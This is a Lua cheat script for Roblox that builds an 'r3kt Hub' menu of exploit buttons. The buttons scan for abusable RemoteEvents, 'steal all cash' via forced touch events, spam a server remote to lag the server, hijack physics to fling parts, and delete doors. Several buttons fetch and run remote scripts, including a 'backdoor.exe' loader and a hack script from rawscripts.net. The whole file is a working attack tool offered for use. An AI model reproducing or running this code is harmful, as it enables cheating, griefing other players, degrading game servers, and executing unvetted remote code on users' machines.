-- Gui to Lua
-- Version: 3.5

-- Instances:

local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local ImageLabel = Instance.new("ImageLabel")
local TextLabel = Instance.new("TextLabel")
local TextLabel_2 = Instance.new("TextLabel")
local TextButton = Instance.new("TextButton")
local TextButton_2 = Instance.new("TextButton")
local TextButton_3 = Instance.new("TextButton")
local TextButton_4 = Instance.new("TextButton")
local TextButton_5 = Instance.new("TextButton")
local TextButton_6 = Instance.new("TextButton")
local TextButton_7 = Instance.new("TextButton")
local TextButton_8 = Instance.new("TextButton")
local TextButton_9 = Instance.new("TextButton")

--Properties:

ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
ScreenGui.ResetOnSpawn = false

Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Frame.BackgroundTransparency = 1.000
Frame.Position = UDim2.new(0.434768617, 0, 0.363779515, 0)
Frame.Size = UDim2.new(0, 350, 0, 176)

ImageLabel.Parent = Frame
ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ImageLabel.BorderColor3 = Color3.fromRGB(170, 85, 255)
ImageLabel.BorderSizePixel = 2
ImageLabel.Size = UDim2.new(0, 350, 0, 175)
ImageLabel.Image = "http://www.roblox.com/asset/?id=7599961287"

TextLabel.Parent = Frame
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.Position = UDim2.new(0.214285716, 0, -0.0625, 0)
TextLabel.Size = UDim2.new(0, 200, 0, 50)
TextLabel.Font = Enum.Font.SourceSans
TextLabel.Text = "r3kt Hub"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextSize = 20.000

TextLabel_2.Parent = Frame
TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.BackgroundTransparency = 1.000
TextLabel_2.Position = UDim2.new(0.2, 0, 0.778409064, 0)
TextLabel_2.Size = UDim2.new(0, 220, 0, 50)
TextLabel_2.Font = Enum.Font.SourceSans
TextLabel_2.Text = "Made by Kosovo#3784 & 0fiiz#7952 & ShakeSphere#4681"
TextLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.TextSize = 13.000
TextLabel_2.TextWrapped = true

TextButton.Parent = Frame
TextButton.BackgroundColor3 = Color3.fromRGB(0, 255, 255)
TextButton.BackgroundTransparency = 0.400
TextButton.Position = UDim2.new(0.034285713, 0, 0.181818187, 0)
TextButton.Size = UDim2.new(0, 115, 0, 31)
TextButton.Font = Enum.Font.SourceSans
TextButton.Text = "Transparancy tool"
TextButton.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton.TextSize = 14.000
TextButton.MouseButton1Down:connect(function()
--[[
Simple vulnerability scanner v1.1
Made by 0fiiz#7952
]]--

load_BackdoorEXE = false
load_SimplySpy = false
load_DestroyToolTest = true

if load_SimplySpy == true then
    loadstring(game:HttpGet("https://raw.githubusercontent.com/exxtremestuffs/SimpleSpySource/master/SimpleSpy.lua"))()
end

if load_BackdoorEXE == true then
    loadstring(game:HttpGet("https://raw.githubusercontent.com/iK4oS/backdoor.exe/v8/src/main.lua"))()
end

local PingWords = {
    "destroy",
    "delete",
    "del",
    "place",
    "remove",
    "replicate",
    "loadstring",
    "rev",
    "admin",
    "create",
    "property",
    "spawn",
    "clear",
    "trash",
    "fire",
    "bomb",
    "explode",
    "color",
    "update",
    "car",
    "money",
    "cheat",
    "data",
    "save",
    "build",
    "backdoor",
    "invis",
    "hide",
    "set"
}

local PossibleRemotes = {}

for i,v in pairs(game:GetDescendants()) do
    if v:IsA("RemoteEvent") then
    for x,z in pairs(PingWords) do
        if string.find(v.Name:lower(), z:lower()) then
               warn("Possible Vulnerability found : ".. v.Name.. " | "..v.ClassName)
               table.insert(PossibleRemotes, v)
            end
        end
    end
end

if load_DestroyToolTest == true then
    mouse = game.Players.LocalPlayer:GetMouse()
tool = Instance.new("Tool")
tool.RequiresHandle = false
tool.Name = "Delete tool"
tool.Activated:connect(function()
for i,v in pairs(PossibleRemotes) do
v:FireServer(mouse.Target)
end
end)
tool.Parent = game.Players.LocalPlayer.Backpack
end
end)

TextButton_2.Parent = Frame
TextButton_2.BackgroundColor3 = Color3.fromRGB(0, 255, 255)
TextButton_2.BackgroundTransparency = 0.400
TextButton_2.Position = UDim2.new(0.382857144, 0, 0.409090936, 0)
TextButton_2.Size = UDim2.new(0, 115, 0, 31)
TextButton_2.Font = Enum.Font.SourceSans
TextButton_2.Text = "Gears"
TextButton_2.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton_2.TextSize = 14.000
TextButton_2.MouseButton1Down:connect(function()
            for f, g in pairs(game:GetService("Workspace"):GetDescendants()) do
                if g.Name == "Giver" then
                    firetouchinterest(game.Players.LocalPlayer.Character.HumanoidRootPart, g, 0)
                    firetouchinterest(game.Players.LocalPlayer.Character.HumanoidRootPart, g, 1)
                end
            end
end)

TextButton_3.Parent = Frame
TextButton_3.BackgroundColor3 = Color3.fromRGB(0, 255, 255)
TextButton_3.BackgroundTransparency = 0.400
TextButton_3.Position = UDim2.new(0.382857144, 0, 0.181818187, 0)
TextButton_3.Size = UDim2.new(0, 115, 0, 31)
TextButton_3.Font = Enum.Font.SourceSans
TextButton_3.Text = "Spam crates"
TextButton_3.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton_3.TextSize = 14.000
TextButton_3.MouseButton1Down:connect(function()
_G.Spam = true
while _G.Spam == true do
local args = {
    [1] = game:GetService("Workspace").Crates.CashCrate
}

game:GetService("ReplicatedStorage").WeaponItems.RemoteEvents.CreateSound:FireServer(unpack(args))
wait(0.1)
end
end)

TextButton_4.Parent = Frame
TextButton_4.BackgroundColor3 = Color3.fromRGB(0, 255, 255)
TextButton_4.BackgroundTransparency = 0.400
TextButton_4.Position = UDim2.new(0.382857144, 0, 0.653409123, 0)
TextButton_4.Size = UDim2.new(0, 115, 0, 31)
TextButton_4.Font = Enum.Font.SourceSans
TextButton_4.Text = "My pro gui"
TextButton_4.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton_4.TextSize = 14.000
TextButton_4.MouseButton1Down:connect(function()
loadstring(game:HttpGet(("https://rawscripts.net/raw/Super-Hero-Tycoon-Haxx-9731"), true))()
end)

TextButton_5.Parent = Frame
TextButton_5.BackgroundColor3 = Color3.fromRGB(0, 255, 255)
TextButton_5.BackgroundTransparency = 0.400
TextButton_5.Position = UDim2.new(0.034285713, 0, 0.653409123, 0)
TextButton_5.Size = UDim2.new(0, 115, 0, 31)
TextButton_5.Font = Enum.Font.SourceSans
TextButton_5.Text = "Steal all cash"
TextButton_5.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton_5.TextSize = 14.000
TextButton_5.MouseButton1Down:connect(function()
            for f, g in pairs(game:GetService("Workspace"):GetDescendants()) do
                if g.Name == "Giver" then
                    firetouchinterest(game.Players.LocalPlayer.Character.HumanoidRootPart, g, 0)
                    firetouchinterest(game.Players.LocalPlayer.Character.HumanoidRootPart, g, 1)
                end
            end
end)

TextButton_6.Parent = Frame
TextButton_6.BackgroundColor3 = Color3.fromRGB(0, 255, 255)
TextButton_6.BackgroundTransparency = 0.400
TextButton_6.Position = UDim2.new(0.737142861, 0, 0.181818187, 0)
TextButton_6.Size = UDim2.new(0, 85, 0, 31)
TextButton_6.Font = Enum.Font.SourceSans
TextButton_6.Text = "explode e"
TextButton_6.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton_6.TextScaled = true
TextButton_6.TextSize = 14.000
TextButton_6.TextWrapped = true
TextButton_6.MouseButton1Down:connect(function()
local UserInputService = game:GetService("UserInputService")
local Mouse = game:GetService("Players").LocalPlayer:GetMouse()
local Folder = Instance.new("Folder", game:GetService("Workspace"))
local Part = Instance.new("Part", Folder)
local Attachment1 = Instance.new("Attachment", Part)
Part.Anchored = true
Part.CanCollide = false
Part.Transparency = 1
local Updated = Mouse.Hit + Vector3.new(0, 5, 0)
local NetworkAccess = coroutine.create(function()
    while wait(0.05) do
    settings().Physics.AllowSleep = false
    while game:GetService("RunService").RenderStepped:Wait() do
        for _, Players in next, game:GetService("Players"):GetPlayers() do
            if Players ~= game:GetService("Players").LocalPlayer then
                Players.MaximumSimulationRadius = 0 
                sethiddenproperty(Players, "SimulationRadius", 0) 
            end 
        end
        game:GetService("Players").LocalPlayer.MaximumSimulationRadius = math.pow(math.huge,math.huge)
        setsimulationradius(math.huge) 
        end
    end 
end) 
coroutine.resume(NetworkAccess)
local function ForcePart(v)
    if v:IsA("Part") and v.Anchored == false and v.Parent:FindFirstChild("Humanoid") == nil and v.Parent:FindFirstChild("Head") == nil and v.Name ~= "Handle" then
        Mouse.TargetFilter = v
        for _, x in next, v:GetChildren() do
            if x:IsA("BodyAngularVelocity") or x:IsA("BodyForce") or x:IsA("BodyGyro") or x:IsA("BodyPosition") or x:IsA("BodyThrust") or x:IsA("BodyVelocity") or x:IsA("RocketPropulsion") then
                x:Destroy()
            end
        end
        if v:FindFirstChild("Attachment") then
            v:FindFirstChild("Attachment"):Destroy()
        end
        if v:FindFirstChild("AlignPosition") then
            v:FindFirstChild("AlignPosition"):Destroy()
        end
        if v:FindFirstChild("Torque") then
            v:FindFirstChild("Torque"):Destroy()
        end
        v.CanCollide = false
        
        local Torque = Instance.new("Torque", v)
        Torque.Torque = Vector3.new(10000500000, 10000500000, 10000500000)
        local AlignPosition = Instance.new("AlignPosition", v)
        local Attachment2 = Instance.new("Attachment", v)
        Torque.Attachment0 = Attachment2
        AlignPosition.MaxForce = 9999999999999999
        AlignPosition.MaxVelocity = math.huge +10000000
        AlignPosition.Responsiveness = 2000
        AlignPosition.Attachment0 = Attachment2 
        AlignPosition.Attachment1 = Attachment1
        
    end
end

for _, v in next, game:GetService("Workspace"):GetDescendants() do
    ForcePart(v)
end

game:GetService("Workspace").DescendantAdded:Connect(function(v)
    ForcePart(v)
end)
UserInputService.InputBegan:Connect(function(Key, Chat)
    if Key.KeyCode == Enum.KeyCode.E and not Chat then
       Updated = Mouse.Hit + Vector3.new(0, 5, 0)
    end
end)
spawn(function()
    while game:GetService("RunService").RenderStepped:Wait() do
        Attachment1.WorldCFrame = Updated
    end
end)
end)

TextButton_7.Parent = Frame
TextButton_7.BackgroundColor3 = Color3.fromRGB(0, 255, 255)
TextButton_7.BackgroundTransparency = 0.400
TextButton_7.Position = UDim2.new(0.737142861, 0, 0.409090936, 0)
TextButton_7.Size = UDim2.new(0, 85, 0, 31)
TextButton_7.Font = Enum.Font.SourceSans
TextButton_7.Text = "No doors"
TextButton_7.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton_7.TextSize = 14.000
TextButton_7.MouseButton1Down:connect(function()
            for f, g in pairs(game:GetService("Workspace"):GetDescendants()) do
                if g.Name == "Pipe" then
                    g:Destroy()
                end
            end
end)

TextButton_8.Parent = Frame
TextButton_8.BackgroundColor3 = Color3.fromRGB(0, 255, 255)
TextButton_8.BackgroundTransparency = 0.400
TextButton_8.Position = UDim2.new(0.737142861, 0, 0.653409123, 0)
TextButton_8.Size = UDim2.new(0, 85, 0, 31)
TextButton_8.Font = Enum.Font.SourceSans
TextButton_8.Text = "no more"
TextButton_8.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton_8.TextSize = 14.000

TextButton_9.Parent = Frame
TextButton_9.BackgroundColor3 = Color3.fromRGB(0, 255, 255)
TextButton_9.BackgroundTransparency = 0.400
TextButton_9.Position = UDim2.new(0.0342857242, 0, 0.409090936, 0)
TextButton_9.Size = UDim2.new(0, 115, 0, 31)
TextButton_9.Font = Enum.Font.SourceSans
TextButton_9.Text = "Lag server"
TextButton_9.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton_9.TextSize = 14.000
TextButton_9.MouseButton1Down:connect(function()
_G.Spam = true
while _G.Spam == true do
local args = {
    [1] = game:GetService("Workspace").Map.baseplate
}

game:GetService("ReplicatedStorage").WeaponItems.RemoteEvents.CreateSound:FireServer(unpack(args))
wait()
end
end)

-- Scripts:

local function GVDSF_fake_script() -- Frame.Dragify 
	local script = Instance.new('LocalScript', Frame)

	local UserInputService = game:GetService("UserInputService")
	
	local dragToggle
	local dragInput
	local dragSpeed
	local dragStart
	local dragPos
	local startPos
	
	function dragify(Frame)
	    dragToggle = nil
	    dragSpeed = 0.50
	    dragInput = nil
	    dragStart = nil
	    dragPos = nil
	    local function updateInput(input)
	        local Delta = input.Position - dragStart
	        local Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + Delta.X, startPos.Y.Scale, startPos.Y.Offset + Delta.Y)
	        game:GetService("TweenService"):Create(Frame, TweenInfo.new(0.30), {Position = Position}):Play()
	    end
	    Frame.InputBegan:Connect(function(input)
	        if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) and UserInputService:GetFocusedTextBox() == nil then
	            dragToggle = true
	            dragStart = input.Position
	            startPos = Frame.Position
	            input.Changed:Connect(function()
	                if input.UserInputState == Enum.UserInputState.End then
	                    dragToggle = false
	                end
	            end)
	        end
	    end)
	    Frame.InputChanged:Connect(function(input)
	        if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
	            dragInput = input
	        end
	    end)
	    game:GetService("UserInputService").InputChanged:Connect(function(input)
	        if input == dragInput and dragToggle then
	            updateInput(input)
	        end
	    end)
	end
	
	dragify(script.Parent)
end
coroutine.wrap(GVDSF_fake_script)()
